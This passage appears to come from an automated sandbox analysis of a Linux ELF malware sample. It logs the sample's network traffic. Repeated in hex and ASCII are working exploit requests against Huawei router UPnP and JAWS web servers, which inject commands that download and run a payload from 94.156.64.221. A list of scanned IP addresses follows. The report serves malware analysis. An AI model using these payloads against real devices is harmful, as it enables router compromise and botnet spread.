70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/t9lNEiD3ui.elf (PID: 6203)Socket: 127.0.0.1::46157Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 70.131.248.228
              Source: unknownTCP traffic detected without corresponding DNS query: 111.78.84.76
              Source: unknownTCP traffic detected without corresponding DNS query: 27.145.196.48
              Source: unknownTCP traffic detected without corresponding DNS query: 126.173.227.52
              Source: unknownTCP traffic detected without corresponding DNS query: 150.218.159.61
              Source: unknownTCP traffic detected without corresponding DNS query: 199.132.136.121
              Source: unknownTCP traffic detected without corresponding DNS query: 180.108.138.11
              Source: unknownTCP traffic detected without corresponding DNS query: 192.136.208.225
              Source: unknownTCP traffic detected without corresponding DNS query: 67.230.209.56
              Source: unknownTCP traffic detected without corresponding DNS query: 118.49.119.48
              Source: unknownTCP traffic detected without corresponding DNS query: 208.43.169.205
              Source: unknownTCP traffic detected without corresponding DNS query: 135.195.128.218
              Source: unknownTCP traffic detected without corresponding DNS query: 65.238.176.218
              Source: unknownTCP traffic detected without corresponding DNS query: 134.14.12.5
              Source: unknownTCP traffic detected without corresponding DNS query: 122.71.226.68
              Source: unknownTCP traffic detected without corresponding DNS query: 17.93.104.146
              Source: unknownTCP traffic detected without corresponding DNS query: 189.83.147.223
              Source: unknownTCP traffic detected without corresponding DNS query: 175.135.111.54
              Source: unknownTCP traffic detected without corresponding DNS query: 149.163.234.131
              Source: unknownTCP traffic detected without corresponding DNS query: 197.205.5.130
              Source: unknownTCP traffic detected without corresponding DNS query: 20.151.76.158
              Source: unknownTCP traffic detected without corresponding DNS query: 159.92.92.196
              Source: unknownTCP traffic detected without corresponding DNS query: 177.112.112.134
              Source: unknownTCP traffic detected without corresponding DNS query: 37.157.37.87
              Source: unknownTCP traffic detected without corresponding DNS query: 183.182.194.206
              Source: unknownTCP traffic detected without corresponding DNS query: 194.21.168.48
              Source: unknownTCP traffic detected without corresponding DNS query: 137.27.147.143
              Source: unknownTCP traffic detected without corresponding DNS query: 107.164.73.14
              Source: unknownTCP traffic detected without corresponding DNS query: 35.179.112.215
              Source: unknownTCP traffic detected without corresponding DNS query: 100.16.253.111
              Source: unknownTCP traffic detected without corresponding DNS query: 171.118.251.96
              Source: unknownTCP traffic detected without corresponding DNS query: 27.217.234.183
              Source: unknownTCP traffic detected without corresponding DNS query: 168.97.202.147
              Source: unknownTCP traffic detected without corresponding DNS query: 35.173.99.165
              Source: unknownTCP traffic detected without corresponding DNS query: 182.133.107.162
              Source: unknownTCP traffic detected without corresponding DNS query: 143.129.215.167
              Source: unknownTCP traffic detected without corresponding DNS query: 53.86.120.35
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.17.17
              Source: unknownTCP traffic detected without corresponding DNS query: 154.9.195.214
              Source: unknownTCP traffic detected without corresponding DNS query: 138.151.225.56
              Source: unknownTCP traffic detected without corresponding DNS query: 131.138.48.194
              Source: unknownTCP traffic detected without corresponding DNS query: 36.45.162.101
              Source: unknownTCP traffic detected without corresponding DNS query: 220.183.106.191
              Source: unknownTCP traffic detected without corresponding DNS query: 166.215.95.47
              Source: unknownTCP traffic detected without corresponding DNS query: 208.179.120.224
              Source: unknownTCP traffic detected without corresponding DNS query: 141.8.39.106
              Source: unknownTCP traffic detected without corresponding DNS query: 170.189.17.116
              Source: unknownTCP traffic detected without corresponding DNS query: 206.42.249.255
              Source: unknownTCP traffic detected without corresponding DNS query: 51.35.254.234
              Source: unknownTCP traffic detected without corresponding DNS query: 179.138.139.6
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
